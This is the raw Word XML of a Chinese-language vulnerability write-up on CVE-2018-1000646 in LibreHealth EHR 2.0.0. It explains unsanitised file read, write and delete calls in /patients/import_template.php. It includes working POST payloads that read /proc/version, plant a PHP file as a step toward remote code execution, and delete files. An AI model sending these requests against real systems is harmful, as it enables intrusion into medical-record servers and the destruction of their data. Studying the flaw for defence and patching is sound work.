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127C5222" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00A71368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A71368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LibreHealth 2.0.0 -</w:t>
      </w:r>
      <w:r w:rsidR="00E01E1D" w:rsidRPr="00E01E1D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任意</w:t>
      </w:r>
      <w:r w:rsidR="00E74604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文件操作</w:t>
      </w:r>
      <w:r w:rsidR="00377925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5F9A9A43" w14:textId="76BE016D" w:rsidR="003E7C09" w:rsidRPr="003E7C09" w:rsidRDefault="003E7C09" w:rsidP="003E7C09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3E7C09">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealthIO LH-EHR是一款开源的电子健康记录和医疗实践管理应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D7A2A" w14:textId="491CF3B3" w:rsidR="004D158C" w:rsidRPr="004D158C" w:rsidRDefault="003E7C09" w:rsidP="003E7C09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3E7C09">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealthIO LH-HER REL-2.0.0版本中的导出模板存在任意文件写入漏洞。攻击者可利用该漏洞写入带有恶意内容的文件并可能远程执行代码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62A5B283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7D1661" w:rsidRPr="007D1661">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealth 2.0.0 -</w:t>
      </w:r>
      <w:r w:rsidR="00E74604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件操作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62E04B78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D83434" w:rsidRPr="00652D7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="00B24A25" w:rsidRPr="00B24A2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LibreHealthIO LH-EHR &lt; REL-2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7690F" w14:textId="1DADB917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="00CA4DFB" w:rsidRPr="00CA4DFB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CVE-2018-1000646</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39801485" w14:textId="2D6EA482" w:rsidR="00A03F53" w:rsidRDefault="00A03F53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08A9DBCF" w14:textId="7B3ACDE6" w:rsidR="00E85C90" w:rsidRDefault="00E85C90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F9D9D5" wp14:editId="1F3BBED6">
            <wp:extent cx="5274310" cy="2314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DD39" w14:textId="14951AC2" w:rsidR="00E85C90" w:rsidRPr="00B959E6" w:rsidRDefault="00E85C90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如图所示，贴</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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入关键</w:t>
      </w:r>
      <w:proofErr w:type="gram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代码。在</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/patients/import_template.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件中使用了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的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数读取文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file_put_contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数写入文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unlink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数删除文件。而且这三个函数传入参数之前，没有对传入参数做任何处理。</w:t>
      </w:r>
      <w:r w:rsidR="00062567">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="00A00E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>写入文件</w:t>
      </w:r>
      <w:r w:rsidR="00A00E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数，文件名和文件内容用户输入可控，文件路径可知，故可以导致远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146688D" w14:textId="6B30798A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44E8FBB0" w14:textId="77777777" w:rsidR="005A37CF" w:rsidRPr="005A37CF" w:rsidRDefault="005A37CF" w:rsidP="00A96FEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.任意文件读取：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27B7FD" w14:textId="3676B61E" w:rsidR="000F53EF" w:rsidRDefault="005A37CF" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealth</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中，有权访问门户网站患者（经过身份验证）的用户可以发送恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>请求读取任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033578F4" w14:textId="64CB53D6" w:rsidR="005A37CF" w:rsidRDefault="005A37CF" w:rsidP="005A37CF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录之后，构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C1DF8" w14:textId="0B9C9F56" w:rsidR="005A37CF" w:rsidRDefault="005A37CF" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST /patients/import_template.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12994D6F" w14:textId="038DAA41" w:rsidR="005A37CF" w:rsidRDefault="00CB438A" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB438A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mode=get&amp;docid=/proc/version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45920731" w14:textId="32D0C215" w:rsidR="00A96FEF" w:rsidRPr="00A96FEF" w:rsidRDefault="009C113C" w:rsidP="00A96FE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68B9C" wp14:editId="18EEFEDD">
            <wp:extent cx="5274310" cy="1584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4070" w14:textId="0DB1DE8D" w:rsidR="00A96FEF" w:rsidRPr="00A96FEF" w:rsidRDefault="00A96FEF" w:rsidP="00A96FEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.任意文件写入：此攻击</w:t>
      </w:r>
      <w:r w:rsidR="00062567">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可导致RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D33FC50" w14:textId="0AFFDCE0" w:rsidR="00A96FEF" w:rsidRPr="00A96FEF" w:rsidRDefault="00A96FEF" w:rsidP="00A96FEF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealth</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中，有权访问门户网站患者（经过身份验证）的用户可以发送写入任意文件的恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D6C1F" w14:textId="3BB8B1A7" w:rsidR="00A96FEF" w:rsidRDefault="00A96FEF" w:rsidP="00A96FEF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>当你发送攻击时，你可以浏览写文件的网站</w:t>
      </w:r>
      <w:r w:rsidR="002204D5" w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/patients/payload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0E9AF" w14:textId="77777777" w:rsidR="00D73B9F" w:rsidRDefault="00D73B9F" w:rsidP="00D73B9F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录之后，构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5141AF92" w14:textId="77777777" w:rsidR="00D73B9F" w:rsidRDefault="00D73B9F" w:rsidP="00D73B9F">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A37CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST /patients/import_template.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB3423" w14:textId="25DDE90B" w:rsidR="00A96FEF" w:rsidRPr="00D73B9F" w:rsidRDefault="00C15AA9" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15AA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mode=save&amp;docid=payload.php&amp;content=&lt;?php phpinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C15AA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C15AA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F2951" w14:textId="4B730FE1" w:rsidR="00D73B9F" w:rsidRDefault="009B554C" w:rsidP="005A37C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350195" wp14:editId="32619478">
            <wp:extent cx="5274310" cy="1885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7C9" w14:textId="649F6DF1" w:rsidR="00D73B9F" w:rsidRDefault="00B1440F" w:rsidP="005A37CF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A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/patients/payload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53499290" w14:textId="42D22ABA" w:rsidR="00B1440F" w:rsidRDefault="00EA5BC8" w:rsidP="005A37C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BE0AD9" wp14:editId="3B7B1F5B">
            <wp:extent cx="5274310" cy="42589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838" w14:textId="4BBC3D32" w:rsidR="00DF7CDB" w:rsidRPr="00DF7CDB" w:rsidRDefault="00DF7CDB" w:rsidP="00DF7CDB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件删除：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387E8A6F" w14:textId="1E026051" w:rsidR="00B1440F" w:rsidRDefault="00DF7CDB" w:rsidP="00DF7CDB">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreHealth</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中，有权访问门户网站患者（经过身份验证）的用户可以发送恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF7CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>请求删除任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF02DD" w14:textId="665783D7" w:rsidR="00FD6BBF" w:rsidRDefault="00FD6BBF" w:rsidP="005A37CF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录之后，构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA0C86" w14:textId="4E39AF18" w:rsidR="00DF7CDB" w:rsidRDefault="00C6416E" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6416E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST /patients/import_template.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7048A" w14:textId="22C936DD" w:rsidR="009A3E4F" w:rsidRDefault="009A3E4F" w:rsidP="005A37CF">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3E4F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mode=delete&amp;docid=payload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A8A70" w14:textId="2975D566" w:rsidR="00A74325" w:rsidRDefault="00A74325" w:rsidP="005A37CF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删除刚刚写入的</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3E4F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77749DFE" w14:textId="003A9D03" w:rsidR="009A3E4F" w:rsidRPr="009A3E4F" w:rsidRDefault="00273904" w:rsidP="005A37C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6357C" wp14:editId="24115088">
            <wp:extent cx="5274310" cy="1968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668" w14:textId="7EC47F43" w:rsidR="00DF7CDB" w:rsidRDefault="00525E19" w:rsidP="005A37CF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再访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/patients/payload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。文件已删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087F31C" w14:textId="05F99E3C" w:rsidR="00346A16" w:rsidRPr="002204D5" w:rsidRDefault="00346A16" w:rsidP="005A37CF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381E3E" wp14:editId="14FAF9C9">
            <wp:extent cx="5274310" cy="1206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4DAC1CA8" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="001360E2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 w:rsidRPr="001360E2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>目前厂商还没有提供补丁或者升级程序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4056" w14:textId="77777777" w:rsidR="002E59D1" w:rsidRDefault="002E59D1" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="44278D5D" w14:textId="77777777" w:rsidR="002E59D1" w:rsidRDefault="002E59D1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5E84" w14:textId="77777777" w:rsidR="002E59D1" w:rsidRDefault="002E59D1" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="537471B6" w14:textId="77777777" w:rsidR="002E59D1" w:rsidRDefault="002E59D1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567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360E2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E6B4B"/>
    <w:rsid w:val="001F18B8"/>
    <w:rsid w:val="001F4DAA"/>
    <w:rsid w:val="002022F8"/>
    <w:rsid w:val="00203399"/>
    <w:rsid w:val="00211F00"/>
    <w:rsid w:val="0021766F"/>
    <w:rsid w:val="002204D5"/>
    <w:rsid w:val="0022700D"/>
    <w:rsid w:val="0023642A"/>
    <w:rsid w:val="00247CA0"/>
    <w:rsid w:val="00251F47"/>
    <w:rsid w:val="00271F2E"/>
    <w:rsid w:val="00273904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E59D1"/>
    <w:rsid w:val="002F096A"/>
    <w:rsid w:val="002F5D22"/>
    <w:rsid w:val="002F795E"/>
    <w:rsid w:val="003031A5"/>
    <w:rsid w:val="00311C63"/>
    <w:rsid w:val="00313E30"/>
    <w:rsid w:val="00326454"/>
    <w:rsid w:val="00326E0D"/>
    <w:rsid w:val="00346A16"/>
    <w:rsid w:val="003542EF"/>
    <w:rsid w:val="0035510D"/>
    <w:rsid w:val="00355B8A"/>
    <w:rsid w:val="003611E7"/>
    <w:rsid w:val="00376C4C"/>
    <w:rsid w:val="00377322"/>
    <w:rsid w:val="00377925"/>
    <w:rsid w:val="00381D3B"/>
    <w:rsid w:val="0038221A"/>
    <w:rsid w:val="00396924"/>
    <w:rsid w:val="003B3DEF"/>
    <w:rsid w:val="003D79C5"/>
    <w:rsid w:val="003E460E"/>
    <w:rsid w:val="003E7C09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5E19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37CF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D1661"/>
    <w:rsid w:val="007D6AE0"/>
    <w:rsid w:val="007E1A97"/>
    <w:rsid w:val="007E4916"/>
    <w:rsid w:val="007F1236"/>
    <w:rsid w:val="007F174D"/>
    <w:rsid w:val="007F2617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3E4F"/>
    <w:rsid w:val="009A6839"/>
    <w:rsid w:val="009B3E23"/>
    <w:rsid w:val="009B554C"/>
    <w:rsid w:val="009C113C"/>
    <w:rsid w:val="009C3203"/>
    <w:rsid w:val="009C504C"/>
    <w:rsid w:val="009D2C17"/>
    <w:rsid w:val="009E2BE8"/>
    <w:rsid w:val="009E58F6"/>
    <w:rsid w:val="009E7537"/>
    <w:rsid w:val="00A00E36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0F79"/>
    <w:rsid w:val="00A64342"/>
    <w:rsid w:val="00A643EE"/>
    <w:rsid w:val="00A71368"/>
    <w:rsid w:val="00A74325"/>
    <w:rsid w:val="00A766E9"/>
    <w:rsid w:val="00A8737A"/>
    <w:rsid w:val="00A9551A"/>
    <w:rsid w:val="00A9643E"/>
    <w:rsid w:val="00A96FEF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40F"/>
    <w:rsid w:val="00B14D87"/>
    <w:rsid w:val="00B1551E"/>
    <w:rsid w:val="00B21713"/>
    <w:rsid w:val="00B21ED4"/>
    <w:rsid w:val="00B22DF4"/>
    <w:rsid w:val="00B24A25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15AA9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6416E"/>
    <w:rsid w:val="00C715AA"/>
    <w:rsid w:val="00C72FB5"/>
    <w:rsid w:val="00C8047F"/>
    <w:rsid w:val="00C8077B"/>
    <w:rsid w:val="00C824D9"/>
    <w:rsid w:val="00C8421D"/>
    <w:rsid w:val="00C849EA"/>
    <w:rsid w:val="00CA4DFB"/>
    <w:rsid w:val="00CB3336"/>
    <w:rsid w:val="00CB438A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73B9F"/>
    <w:rsid w:val="00D83434"/>
    <w:rsid w:val="00D917A2"/>
    <w:rsid w:val="00DA05D5"/>
    <w:rsid w:val="00DA227B"/>
    <w:rsid w:val="00DA2C8C"/>
    <w:rsid w:val="00DB0791"/>
    <w:rsid w:val="00DC7012"/>
    <w:rsid w:val="00DE7684"/>
    <w:rsid w:val="00DF44D7"/>
    <w:rsid w:val="00DF7CDB"/>
    <w:rsid w:val="00E01E1D"/>
    <w:rsid w:val="00E03C77"/>
    <w:rsid w:val="00E058AC"/>
    <w:rsid w:val="00E0620F"/>
    <w:rsid w:val="00E132DC"/>
    <w:rsid w:val="00E217B7"/>
    <w:rsid w:val="00E3290B"/>
    <w:rsid w:val="00E338DD"/>
    <w:rsid w:val="00E37157"/>
    <w:rsid w:val="00E44AEC"/>
    <w:rsid w:val="00E453C6"/>
    <w:rsid w:val="00E46233"/>
    <w:rsid w:val="00E63E6A"/>
    <w:rsid w:val="00E74604"/>
    <w:rsid w:val="00E765BE"/>
    <w:rsid w:val="00E76CB2"/>
    <w:rsid w:val="00E77841"/>
    <w:rsid w:val="00E848F0"/>
    <w:rsid w:val="00E85C90"/>
    <w:rsid w:val="00E87B64"/>
    <w:rsid w:val="00EA556B"/>
    <w:rsid w:val="00EA5BC8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D6BBF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E1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83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-30T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08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